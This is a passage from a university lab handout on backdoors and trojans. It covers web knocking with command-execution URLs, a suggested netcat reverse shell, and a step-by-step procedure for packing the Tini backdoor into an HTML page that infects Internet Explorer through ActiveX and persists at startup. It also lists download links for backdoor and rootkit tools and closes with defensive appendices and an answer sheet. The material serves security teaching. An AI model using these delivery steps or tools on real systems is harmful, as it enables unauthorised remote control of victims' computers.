check whether you can view the homepage of the web daemon. 4. Go to the browser and type http://a.b.c.d+1 e.g. http://57.35.6.167 5. If you cannot see a page, please ask the TA for assistance in setting up apache. 6. Once the web service has started, copy the perl script (knock.pl) to your machine. 7. To perform web knocking, we basically send a knocking code to the web server. In our example, the knocking code is “command_to_execute=”, followed by the specific command which we wish to execute. Try numerous different commands such as ls, ll, ps, w, etc and note the results. http://a.b.c.d+1/command_to_execute=ll http://a.b.c.d+1/command_to_execute=ps http://a.b.c.d+1/command_to_execute=w Additionally, you could also execute netcat to open a reverse shell from the server to your machine. 8. Now, at the command prompt type $ perl knock.pl This will cause the perl script to be run, executing all the commands that were requested. We do this so we can simulate the web knocker being executed as a cron script. Although setting this script up as a cron job is beyond the scope of this lab, we intend to simulate its execution. 24 24 Screenshot #1 : Capture the output of the perl script Your output should look like [root@RedHat72 webknock]# perl knock.pl Executing : ll total 36 -rw-r--r-- 1 root root 0 Oct 10 23:12 -rw-r--r-- 1 root root 717 Oct 9 20:46 -rw-r--r-- 1 root root 735 Oct 10 23:12 drwxr-xr-x 2 root root 4096 Oct 9 20:36 -rwxrwxr-x 1 root root 1085 Oct 10 11:35 cmd_exec.new cmd_exec.old diff_file hello knock.pl Executing : ps PID TTY TIME CMD 21023 pts/2 00:00:00 bash 21093 pts/2 00:00:00 perl 21102 pts/2 00:00:00 ps Executing : w 23:12:15 up 2 days, 6:40, 4 users, load average: 0.08, 0.02, 0.01 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT jeremy :0 Sat19 ?xdm? 7:24 0.03s /bin/sh jeremy pts/1 Sat19 2days 0.00s 0.56s kdeinit: kded root pts/6 23:12 0.00s 0.00s 0.00s /bin/bash root pts/2 57.35.6.166 23:11 0.00s 0.02s 0.00s perl knock.pl [root@RedHat72 webknock]# 9. Under ideal conditions we would most likely set this up as a cron script so that it runs at fixed intervals of time, say every five minutes. 10. To setup this script as a cron script, we will have to edit the crontab file in the /etc/ folder Section 11: Using Explorer’s ActiveX to Propagate Trojans/Backdoors Trojans can be distributed to users of explorer because of the use of Explorer’s ActiveX which executes scripts from webpages. We will now use a backdoor named Tini and a program that converts EXEs to HTML called EXE2HTML to infect a virtual machine. For this we download a program called EXE2HTML and Tini from: http://www.illmob.org/files.html Tini is a small backdoor (3 kb) which will be used to open a remote shell. Size is important because this method will fail if the file is too big since it will occupy around 4 times its size in html. Hackers will probably replace Tini for a small Trojan which automatically downloads a bigger more complex Trojan from the internet. The first step is to convert Tini into an html file to be sent over the internet. For this we perform the following set of commands: 25 25 Copy tini.exe to the same directory of EXE2HTML.EXE Double click on EXE2HTML.EXE Press Tab three times to get to the Source File: option. Type the name of the file to be converted to html (i.e. tini.exe) Press Tab five more times to reach [ ] None and check it by pressing enter Press Tab nine more times to reach [ ] Compile HTML. Your window should now look something similar to the following screen shot: Press Enter. You will now have an html file named OUTPUT.HTML. This page contains the file Tini.exe and the code necessary for internet explorer. An attacker will probably place this page in a web server and give links to the people he wants to infect. We will Double click on this html file to open it using internet explorer. This simulates opening a web page from a web server. You will see a window like the following: 26 26 Internet Explorer tries to warn you but most people just click Yes to continue. In versions 5.0/5.1 of Internet Exporer, it does not ask if you want to run the ActiveX control. Click Yes to accept. Because the html file was opened, the file WINDRV.HTA was created on Start>All Programs>Startup which contains the program to be executed. 27 27 The executable webpage is placed here because it will now be executed every time the computer boots. Reboot your virtual machine. After the reboot, turn on another virtual machine to telnet from. It can be either windows or linux. Type: telnet <Target IP> 7777 7777 is the port number of Tini. Now wait a few seconds and press Enter. It is important that you press Enter or you will not see anything. In linux you will now get a shell as illustrated on the following screen shot: 28 28 In windows you will see the following: 29 29 General Questions How long did it take you to complete this lab? Was it an appropriate length lab? What corrections and or improvements do you suggest for this lab? Please be very specific and if you add new material give the exact wording and instructions you would give to future students in the new lab handout. You may cross out and edit the text of the lab on previous pages to make corrections. What corrections and or improvements do you suggest for this lab? Please be very specific and if you add new material give the exact wording and instructions you would give to future students in the new lab handout. You need to be very specific and provide details. You need to actually do the suggested additions in the lab and provide solutions to your suggested additions. Caution as usual: only extract and use the tools you downloaded in the safe and approved environment of the network security laboratory. 30 30 Appendix A: Win XP Safeguarding http://www.windowsecurity.com/articles/Hidden_Backdoors_Trojan_Horses_and_Rootkit_Tools _in_a_Windows_Environment.html Is your system secure? How do you know? A machine is very rarely targeted for an attack for any other reason than because it was vulnerable. One of the first steps in being proactive is to assess your basic security policy rules and requirements. I think that having an up-to-date anti-virus software installed is a primary concern, and even it won't fully protect your machine itself, it can be a lifesaver, providing good protection against most viruses and trojans. Another good practice is to look routinely at any modification of programs to discover new, odd services or processes. Administration scripts are very useful tools in this regard, particularly when dealing with multiple systems. One might also wish to consider host scanning on your network from time to time. If you suspect that there is an open port at your computer, give a snapshot to check whether it is authorized or no. You may use network, application diagnosis and troubleshooting programs such as TCPview (Fig. 5) [12], FPort [13], Inzider [14], Active Ports (Fig. 6) [15], or Vision [16]. Fig. 5 TCPview tool allows to locate which application opened a port in your computer. Like Active Ports, it tells you what is running on which port. 31 31 Fig. 6 Active Ports in action These tools provide a means to identify the specific application opening the port. Moreover, they let one avoid using Netstat, if it suspects that is has been replaced or infected. This brings me to another interesting consideration: whichever tool is used, it is a good practice to use original tools previously uploaded on a trusty diskette or CD-ROM when attempting to make a check of the system. If any doubt exists whether individual tools are original ones, checksum them to check if they match the installation CD-ROM. In this regard, ListDlls [17] and Process Explorer [18] (Fig. 7) can certainly be useful if finding any suspect signs of trojan infected or backdoored processes. 32 32 Fig. 7 Process Explorer that displays object processes and related DLL libraries These programs with their DLL libraries give some assistance and provide additional information on handling incidents, investigations and conducting analysis to gather legal evidence in view of criminal prosecution. May I also suggest that one pay closer attention to the registry keys that are responsible for starting programs on the system startup. In most cases, these registry elements usually contain some indication of how the intruder gained access, from where, when, etc. These are: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\KnownDLLs HKEY_LOCAL_MACHINE\System\ControlSet001\Control\Session Manager\KnownDLLs HKEY_LOCAL_MACHINE\System\ControlSet\Services HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\RunOnce HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\RunOnceEx HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\WinLogon HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows (run) HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\RunOnce HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\RunOnceEx HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows (run) HKEY_CLASSES_ROOT\exefile\shell\open\command 33 33 It is extremely important to establish consistent access permissions on these keys and activate inspection tools to continuously monitor for any malicious attempts. The same applies to those system directories and files that are security critical. A commonly accepted computer security policy usually starts with a “sound” firewall as a guard against backdoors. Even if the intruder manages to install a backdoor, the firewall will block him from getting to the listening port. In fact, bypassing a firewall is not a plug-n-play thing, but I take liberty to serve a nice dose of pessimism. There are known hacker tools that can get through even the most hardened firewalls. However this is beyond the scope of this article, so I would recommend reading the document available at the address: http://www.spirit.com/Network/net0699.txt. Finally, I would like to raise your awareness about a certain issue. Once your machine has been compromised and the hacker has gained total administrative access, be very careful in recovering the system from the back-up copy or the disk image! I have personally experienced a situation, where someone replaced a WWW site. The system administrator had retrieved the system from a back-up copy, patched the system, updated the access database and changed passwords. Thus, he has considered the server perfectly safe. But he overlooked the fact, that the intrusion had been made long before he made the copy containing a back-doored version. So, I would strongly recommend checking the system whenever it is backed up. Hackers increasingly threaten the network community with their new techniques, backdoors and Trojan horses. Therefore we must take steps to guard against known methods of hacking, even though their will still be a large number of worrying factors we don’t know about. The only thing is absolutely obvious – you never know how long your immune system can hold out before breaking down. Tools: [1] Netcat - http://www.hackerscor.com/km/files/hfiles/ncnt090.zip [2] iCMD - http://go8.163.com/lmqkkk/mytools/iCmd.exe [3] RemoteNC - http://go8.163.com/lmqkkk/mytools/remotenc.zip [4] Tini - http://go8.163.com/lmqkkk/mytools/tini.exe [5] WinShell - http://go8.163.com/lmqkkk/mytools/Winshell4.0.zip [6] CGI-backdoor - http://go8.163.com/lmqkkk/mytools/cgi.zip [7] Remote Administrator - www.radmin.com [8] TightVNC - http://www.tightvnc.com/download.html [9] Rootkit v.0.44 – www.ndsafe.com/fires/rk_044.zip [10] Rootki v.0.40 - http://www.megasecurity.org/Tools/Files/Nt_rootkit0.40.zip [11] IIP Driver - http://www.pedestalsoftware.com/intact/iipdriver.htm [12] TCPview – www.winternals.com [13] Fport - http://www.foundstone.com/knowledge/proddesc/fport.html [14] Inzider - http://ntsecurity.nu/toolbox/inzider/ [15] Active Ports - http://www.ntutility.com/freeware.html [16] Vision - http://www.foundstone.com/knowledge/proddesc/vision.html [17] ListDlls – http://www.sysinternals.com/ntw2k/freeware/listdlls.shtml [18] Process Explorer - http://www.sysinternals.com/ntw2k/freeware/procexp.shtml [19] LANguard Network Security Scanner 34 34 Appendix B: Trojan Removal http://forums.majorgeeks.com/showthread.php?t=35407 Introduction: This article reflects countless hours of experience removing spyware, trojans and viruses. If you can take the time to do all of these steps, there's a good chance your problem will be solved by following this article. While all of these steps are not required for each case, they should be beneficial to all. In general, these steps should work on all versions of Windows XP, but some may not apply to older operating systems like Windows 98. If you need to post a new thread requesting support be sure you have done all of these steps, tell us you did so, what symptoms you are experiencing and then follow any directions we give you exactly. As you can see from reading some of the threads, people often ask for advice, then only do bits and pieces. This will not help you; It will frustrate us and take more time than required Section 1 makes sure your computer is not at risk for hard to remove viruses. Section 2 covers cleaning and removal. Section 3 makes suggestions on securing your machine after clean up. Complete ALL the applicable steps of Getting Prepared and then you MUST complete all 4 steps from Scanning And Cleaning Steps. Getting Prepared; Steps to be sure your system is ready to be scanned: 1: Disable System Restore temporarily (WinXP & WinME only) if you are infected; Any trojans, spyware, etc. you may have picked up could have been saved in System Restore and are waiting to re-infect you. Since System Restore is a protected directory, your tools can not access it to delete files, trapping viruses inside. Please follow instructions to do that here: http://forums.majorgeeks.com/showthread.php?t=31668 2: Network Security, Workstation Netlogon Services & Remote Procedure Call (RPC) Helper (Windows XP, 2K, NT); Only do this step if you have the about:blank or home search hijack. You need to check to see if any of the following three Windows services are running: Network Security Service Workstation Netlogon Service Remote Procedure Call (RPC) Helper To do this, click Start, Run, and enter the following in the Open box: "services.msc" (without the quotes). Then click OK. Now, in the Services window that pops up look for exactly the following service names (no others) "Network Security Service" or "Workstation Netlogon Service" or "Remote Procedure Call (RPC) Helper". (NOTE: DO NOT DISABLE: Remote Procedure Call (RPC) or Remote Procedure Call (RPC) Locator. They are both required services and are unrelated to the hijacker.). You could have more than one of the 3 mentioned bad services, so look for all of them. If you find these services, you must right click on it to bring up the service Properties window and do the following (refer to the Figure too): Step 1: Stop the service by click the Stop button. 35 35 Step 2: Now, disable it by changing the Startup type to Disabled and click Apply If you do not find these exact services, do not worry and just skip this step. DO NOT DISABLE ANYTHING UNLESS THE EXACT WORDING OF THE SERVICE NAMES IS MATCHED. 3: Enable viewing of hidden files and folders and extensions; Some programs can hide this way by not being visible in Windows. Start Windows Explorer and click on your main hard drive, usually c:\. Then select Tools from the top of Windows Explorer and then Folder Options. Go to the View tab. Scroll down to the folder icon that says Hidden files and folders and check show hidden files and folders. Also, right below it, uncheck the hide file extensions for known types. Not doing this could allow file extensions commonly used by trojans and spyware to be hidden, for example a file ending in .exe or dll making manually finding it, if needed, difficult to impossible. 4: Downloading Tools; Download the following tools and save in your favorite download folder or create one, for example C:\Temp or C:\Downloads. And then install, update, and configure as indicated below. While this may seem like overkill, there currently is no one perfect removal tool. Because of this, to properly find and fix your problem, you need to try a variety of programs. TIP: Create a folder on your C:\ drive for the tools/utilities you will need to use. For example: Navigate to your C:\ folder and create a right click on a blank spot in the window > choose New > Folder. Name this folder Spyware Tools. Now you can save the tools you will be downloading to this folder and if you prefer, create sub-folders named for each individual utility. Ad-Aware SE.......Install, click Check for Updates now and get any updates, then exit. Ad-Aware VX2 Cleaner Plug-In.....Install only CCleaner.............Install only, then exit Spybot................Install, do the search for updates now and get any updates, then exit. Spybot - Search and Destroy DSO Exploit Fix - Install this patch on top of Spybot to fix the DSO Exploit bug SpywareBlaster...Install, click Download Latest Protection Updates, Check for Updates, and then Enable All Protection, then exit. It does a great job of blocking known vulnerabilities as well as known malicious websites. McAfee AVERT Stinger.....No installation required! Ready to run as is. CWShredder......No installation required! Just unzip it to a folder. Kill2me..............No installation required! Just unzip it to a folder. about:Buster......No installation required! Just unzip it to a folder. Click Update and download any before scanning. HSRemove........No installation required! Ready to run as is. (Only for WinNT, 2K, XP) 36 36 Your system is now ready to be properly scanned for spyware, trojans and viruses. Scanning And Cleaning Steps: (These 4 steps are NOT optional and must be run!!) 1: Virus And Trojan Scanning (do not skip these two scans or you will be asked to run them before continuing) a) Win9x (Windows 95, 98, 98SE) users boot normal mode. do an online scan at Trend Micro's Free Online Virus Scan do an online scan at Symantec Security Check now boot in safe mode (and remain there) and run McAfee AVERT Stinger. See how to boot in safe mode below. b) And Windows XP, 2000, NT, ME, users boot in "safe mode with networking support" (and remain in there). See how to boot in safe mode below. do an online scan at Trend Micro's Free Online Virus Scan do an online scan at Symantec Security Check run McAfee AVERT Stinger NOTE: If using a non-IE browser, you can use Trend Micro's online scan with Java located HERE How to boot in safe mode: To boot into safe mode, restart your computer and tap the f8 key (after first black and white screen, but before the Windows splash screen) until you get to a black and white screen asking you what to do. With Windows XP, 2000, NT, ME: Use your arrow keys and select "safe mode with networking support". Booting in safe mode is important because best results are achieved since safe mode disables most drivers and running programs. If you have a problem for any reason trying to run these scans in safe mode, do them in normal boot mode but make sure you tell us that in any subsequent message you may need to post about your problem, Important Note Before continuing with scans: To provide the greatest ability for the scanners to properly detect and remove all forms of malware, make sure to close any other applications that are running on your system especially browsers before you run these tools. It is in your best interest to follow this directive. So disconnect from the internet now and close all browsers and any other applications you have running now and then continue with step 2 below. 2: Clean Your Hard Drive; Remove temporary internet and other files not needed with CCleaner. Run CCleaner with the default options to clean out temporary files. Optionally, check the clean "Delete Index.dat" checkbox. Only use the Windows tab and select Run Cleaner. Do not run any other options from other tabs. 3: Main Spyware Scan And Removal; Scan your machine with Ad-Aware SE (remember to install the AdAware VX2 Cleaner Plug-In for it) and Spybot. Look for the Immunize feature in Spybot and use it. Make sure you install the Spybot DSO Exploit patch before running a scan with Spybot. 4: Secondary Spyware Scan And Removal: Other Removal Tools; Run the other programs you downloaded; CWShredder (make sure you select Fix), Kill2me, about:Buster and HSRemove. They are free, standalone and easy to use. Note: about:Buster and HSRemove need only be run if you are having about:blank or HomeSearchAssistent hijacks. Also, note that HSRemove is not compatible 37 37 with Win9x or WinMe systems. OPTIONAL Steps: require you reboot back to normal mode. 1: OPTIONAL: If you can not remove the stubborn "Only the Best" aka "HSA" HIJACKER please view this thread by Chaslang, an expert in removing these things, can be found here: http://forums.majorgeeks.com/showthread.php?t=38772 2: OPTIONAL: Scan With Hijack This; If you have gotten this far without success, you may need to download Hijack This!. Taking a few minutes to read this tutorial is required before posting a logfile so that you can get the most from it and make it easier to diagnose. Please post your logfile as an attachment and only when asked. Make sure that you tell us in your post that you've already followed the instructions on this page so we don't waste your and our time by posting a link to it in your thread. Also, it would be helpful to indicate what kind of problems the above steps have found and fixed (or failed to fix). Alternative Scans - If still having problems If you are still having problems after performing all the above, these alternative scans below may prove to be useful. As mentioned above, it would be good to perform these in safe mode since it may assist in the ability to remove an infection. However, there are cases where a problem does not show itself completely until you boot in normal mode. So first run these scans in normal boot mode, and if they have problems cleaning any particular items repeat the scan in safe mode to see if it helps. Always keep track of what these scans find (save logs or take notes), and report them back in your thread to anyone helping you. Bitdefender online scan RavAntivirus online scan <-- select Auto Clean then click Scan My PC TrojanScan online scan a-squared (a²) Free edition free but requires an email address to register avast! Virus Cleaner Tool ADS SPY - Alternate Data Streams Spy from Merijn Recent browser hijackers started using ADS to hide their files, and very few anti-malware scanners detect this. Use ADS Spy to find and remove these streams. Note: this app also displays legitimate ADS streams. Don't delete streams if you are not completely sure they are malicious! You should consult with an expert before deleting any files with this tool. Keeping your computer safe and secure: 1: Windows Update; Update Windows at Microsoft Windows Update. Just click on Start, then Windows Update. Many security loopholes are found and exploited and Microsoft patches for these. Millions of people were affected by the Blaster worm because they were not up to date, as an example. If you're not up to date, you're at risk. You can setup automatic updates in your control panel; go to Start, Settings, Control panel. 2: Remove Microsoft Java; Microsofts no longer supported version of Java is often a source of installed spyware and hijacks so it is a good idea to remove Microsoft Java Virtual Machine and Install Sun Java. To remove it follow these steps. 1: Select Start > Run and Enter "RunDll32 advpack.dll,LaunchINFSection java.inf,UnInstall" in the Open box, and click ok. 38 38 2: Click Yes to confirm that you want to remove the Microsoft VM 3: When prompted, reboot the computer 4: Remove the following items: (Systemroot is where windows is installed (usually C:\Windows) The \%Systemroot%\Java folder The file java.PNF from the \%Systemroot%\inf folder The files jview.exe and wjview.exe from the \%Systemroot%\system32 folder The registry subkey HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Java VM The registry subkey HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ InternetExplorer \ AdvancedOptions \ JAVA_VM OR Download and run the MSJVM Removal Tool 1.0a 5: Install Sun Java here: http://java.com/en/ You can choose a different language if you need it from the top menu on that page. (Any files or registry entries not found or errors can be ignored and go to the next step) Optionally, consider replacing your web browser with a free alternative like FireFox or a shareware browser like Opera, for example.[IMG] 39 39 ECE 4112 Internetwork Security Lab 6: Backdoors and Trojans Group Number: _________ Member Names: ___________________ _______________________ Answer Sheet Q1.1.1. Is the binary filing the same, or has it been altered? Compare the file sizes of the file on the two systems as it is transferred back and forth. Q1.1.2. What can you say about Netcat’s ability to transfer binary files? Q1.1.3. What do you conclude from this? Screenshot #1:Take a screenshot of these windows and submit it with your report. Q1.1.4. Draw a diagram explaining how the relay works and the directions of data flow. Q1.1.5. Aside from the four uses listed in this lab, Netcat can be used in many different ways. Suggest another way that Netcat could be used (in detail). Q1.1.6. What defenses could you use against an attack like netcat backdoor? 40 40 Section 2 Screenshot #2: Take a screenshot of the ethereal output. Q2.1.1. What defenses could you use against an attack like icmp backdoor? Q3.1.1. How would you detect that VNC was installed and/or running on your Windows machine? Q3.1.2. How would you detect that VNC was installed on your Linux machine? Screenshots #3, #4:Take a screenshot of the VNC server screen and another of the VNC viewer accessing the VNC server. Turn these in with your report. Section 3 Q3.1.3 What defenses could you use against an attack like VNC? Section 4 Screenshot #5: Submit a screenshot of BO2k successfully being used to gain access to the password file of the WinXP victim. 41 41 Section 5 Q5.1.1.What happens when you do what the email says? Q5.2.2. What suggestions do you have about improving the security of such email programs? Screenshot #6. Take a screen shot of the remote access over the telnet connection and hacked login. Screenshot #7. Turnin a shot of the new process created. Screenshot #8. Screen shot of the popup box with the path of the nc.exe program and command line arguments. Screenshot #9. Screenshot of the attacking machine running the ack tunneling attack. Section 9: Port Knocking 1) Create an access rule to allow an OpenBSD 3.3-3.5 box on the non-routable 10.0.0.0/8 subnet to access port 22 using an encrypted knock sequence. 2) It was mentioned that port knocking began with a virus. Why would a virus writer want to include port knocking in the backdoor. 42 42 3) No mention was made as to how port knocking servers finally close the open firewall port. List 2 ways which could be employed to close the port. Section 10. Tricking users into opening backdoors. Q10.1.1 Does the notepad program appear after closing the calculator program? Q10.1.2 Can you see notepad.exe in the processes window this time? Q10.1.3 How do you detect a Trojan of this kind? General Questions How long did it take you to complete this lab? Was it an appropriate length lab? What corrections and or improvements do you suggest for this lab? You may cross out and edit the text of the lab on previous pages to make corrections. What corrections and or improvements do you suggest for this lab? Please be very specific and if you add new material give the exact wording and instructions you would give to future students in the new lab handout. You need to be very specific and provide details. You need to actually do the suggested additions in the lab and provide solutions to your suggested additions. Caution as usual: only extract and use the tools you downloaded in the safe and approved environment of the network security laboratory. Turn-in Checklist 1- Screenshots 1 to 9. 2- Answer Sheet with answers. 3- Any additions for the lab. 43 43